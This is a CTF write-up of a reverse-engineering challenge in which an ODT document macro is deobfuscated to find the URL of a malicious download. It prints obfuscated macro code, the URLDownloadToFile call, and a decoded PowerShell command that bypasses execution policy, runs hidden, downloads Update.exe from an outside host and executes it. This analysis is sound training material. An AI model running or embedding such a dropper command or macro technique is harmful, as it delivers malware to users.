FakeCTF - Malware 0x1

Jun 18, 2022

4 mins read

Reverse Engineering Malware
Reverse engineering Malware

Go back to write-ups list

Category: Reverse

Creator: HømardBøy

Attachments:

This challenge gives us an ODT file (that I didn’t open, but you can do it at your own risk). Since it was in the Reverse category, we can easily guess we will have to reverse a macro inside the document.

That’s aso what the description of the challenge tells us, pointing out that we have to identify the URL of a malicious resource downloaded by this document.

I’m not super familiar with the ODT document format, but I know one thing: the OpenDocument (as well as the Microsoft document format by the way) use ZIP archives! Therefore we can open them with a regular archive software.

ODT files are ZIP archives

I looked around and found a file called Module1.xml in the folder Basic/Standard. This name really reminded me of the default name for Visual Basic classes (and that’s the language for used for macros).

In this XML file, we can find the VBA code of the module, which really doesn’t look appealing.

Module1.xml

The sub that called my attention is the Main sub:

Sub Main
If vqqzycjqjpkhqvovmi() = 0 Then
Dim wzhtvfbpqbuzmustotc, Tmpwzhtvfbpqbuzmustotc As String
Dim hbtogbnfbxcaekszei, regaajfhpscnbmcwmwprjge As String
Dim ytnqvabyudituwreskajsxwdAs As String
Dim lhpvebwowSplit As Integer
If erwgpzsepdzttmjuvnovbwtc() = 1 Then
Tmpwzhtvfbpqbuzmustotc = mpocpedrdedylqthvgzdapya()
wzhtvfbpqbuzmustotc = amwxnlxcctjstjjgqlkspqnm(Tmpwzhtvfbpqbuzmustotc)
hbtogbnfbxcaekszei = cxyhvqmc(Tmpwzhtvfbpqbuzmustotc & wzhtvfbpqbuzmustotc)
regaajfhpscnbmcwmwprjge = qbyghksgdipg(hbtogbnfbxcaekszei)
regaajfhpscnbmcwmwprjge = yqzfgdmt(regaajfhpscnbmcwmwprjge)
rukbizjwgxckvFlag(regaajfhpscnbmcwmwprjge)
...

Once we clean and translate it a bit, we get:

Sub Main
    Dim FileName, FolderPath As String
    Dim FileContent, DecryptedCode As String
    FolderPath = CreateTempFolder()
    FileName = DownloadCode(FolderPath)
    FileContent = ReadFile(FolderPath & FileName)
    DecryptedCode = ReplaceThings(FileContent)
    DecryptedCode = Decrypt(DecryptedCode)
    Run(DecryptedCode)
    ...

First I checked this “DownloadCode” sub. It calls an external function from Windows called URLDownloadToFile, and since it is imported in the code, we can find its signature:

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szqegxabjgwrvivilr As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

From this, we infer that the URL is the second argument.

Next, something we can find accross the whole script is the way it builds strings. For example:

wbsggcbesxgmx = Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & Chr(114) & "" & Chr(101) & "" & Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & Chr(99) & "" & Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & Chr(47) & "" & Chr(114) & "" & Chr(97) & "" & Chr(119) & ""
URLDownloadToFile(ynkgtlqhx, wbsggcbesxgmx, Macrokvjymzmbg, ynkgtlqhx, ynkgtlqhx)

I chose this example on purpose because it builds the string used as the URL. The resulting URL is: https://rentry.co/t69hh4/raw

I tried this URL as the flag but obviously it couldn’t be that simple. In fact, the content of this file is a very big number:

509923764891063459923764891063539923764891063399923764891063489923764891063499923764891063429923764891063399923764891063469923764891063469923764891063108992376489106339992376489106358992376489106339992376489106398992376...

So let’s look at the other subs:

Sub ReplaceThings(BigNumber As String) As String
    Dim result As String
    result = Replace(BigNumber, "9657665657376593676575387986", "")
    result = Replace(BigNumber, "9923764891063", " ")
    Return result
End Sub

Sub Decrypt(EncryptedString As String) As String
    Dim Characters() As Integer
    Dim c As Integer
    Dim result As String
    result = ""
    Characters = Split(EncryptedString, " ")
    for each c in Characters
        Dim DecryptedChar = c XOR 66
        result = result & Chr(DecryptedChar)
    next
    Return result
End Sub

From there, decrypting the text becomes fairly easy, by using those two functions. We then get:

powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://microsoft.security.update.fake/files/Update.exe","$env:APPDATA\\Update.exe"); Start-Process ("$env:APPDATA\\Update.exe")

And we get a new URL which is the flag: http://microsoft.security.update.fake/files/Update.exe

Go back to write-ups list

Sharing is caring!